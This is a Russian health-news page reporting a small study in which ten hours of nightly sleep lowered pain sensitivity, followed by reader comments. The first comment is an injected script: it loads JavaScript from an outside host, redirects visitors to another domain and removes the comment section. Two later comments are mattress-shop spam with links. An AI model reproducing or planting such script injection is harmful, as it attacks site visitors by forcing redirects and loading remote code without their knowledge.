Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Хотите не чувствовать бол...  >>  Хотите не чувствовать боли – спите дольше
 
Обратная связь
 

Хотите не чувствовать боли – спите дольше

Размер шрифта
31 января 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые доказали, что десятичасовой ночной сон увеличивает концентрацию внимания и уменьшает болевую чувствительность.

Избавиться от боли путем крепкого долгого сна

В исследовании приняли участие 18 здоровых добровольцев, которых разделили на две группы. В течение 4 ночей участники одной группы спали столько, сколько они привыкли, а участники другой группы – по 10 часов. Для объективной оценки дневной сонливости ученые использовали множественный тест латентности ко сну, болевой чувствительности – тепловое излучение.

Полученные результаты свидетельствуют о том, что участники второй группы каждую ночь спали на 2 часа больше, чем участники первой группы. Это привело к увеличению концентрации внимания и уменьшению болевой чувствительности. После окончания исследования участники второй группы могли удерживать палец на источнике теплового излучения на 25% дольше, чем раньше, что является отражением уменьшения болевой чувствительности.

«Нам удалось доказать, что продолжительный сон играет важную роль в лечении заболеваний, сопровождающихся хронической болью, а также при подготовке к операциям. Удивительно, что ночной сон оказывает существенное влияние на болевую чувствительность», – поясняет автор исследования Тимоти Роэрс.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

2 - Гость

22 августа 2015 в 20:51

Цитировать   |   Пожаловаться

И при этом не пишут,во сколько надо ложиться спать. Если в два ночи,то десятичасовой сон не поможет. А встанешь разбитый и вялый.

3 - manzora

17 февраля 2016 в 14:49

Цитировать   |   Пожаловаться

Думаю большую роль еще играет на чем спишь.

4 - broba

17 февраля 2016 в 20:28

Цитировать   |   Пожаловаться

manzora 17 февраля 2016 в 14:49
Думаю большую роль еще играет на чем спишь.
 Согласна с вами. Из-за неправильной посадки или кровати потом может возникнуть много проблем со спиной. Я дочке отличный матрас купила https://matras-krovat.ru/, с ней несколько раз засыпала. Очень понравился, на днях и себе закажем.  

5 - Гость

20 июля 2016 в 10:33

Цитировать   |   Пожаловаться

Я не могу рано ложиться. Просто я Сова. С утра очень тяжело встаю. Не давно купила ортопедический матрас http://mir-matrasov.su/matras-rayton-motion-kollektsiya-life/. Да, пожалуй он себя оправдывает, я стала лучше высыпаться. 

Статьи

       
Голые крысы спасут людей от боли   7 сигналов, которые нельзя игнорировать   Как избавиться от боли без лекарств   Что ваш сон говорит о вашем здоровье  
30 января 2013Хотите не чувствовать боли – спите дольше 29 октября 2012Голые крысы спасут людей от боли
 
21 ноября 2012Змеиный яд обезболивает как морфин 04 января 2013Сбылась мечта студента: уснул, а утром уже все знаешь
 

Слайдшоу

1
5 упражнений против боли
4 боли, которые нельзя игнорировать
Что случилось с моим сном?

Тесты

1
Рискуете ли вы заболеть остеохондрозом?
Какой матрас вам подходит?
Хорошо ли Вы спите?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.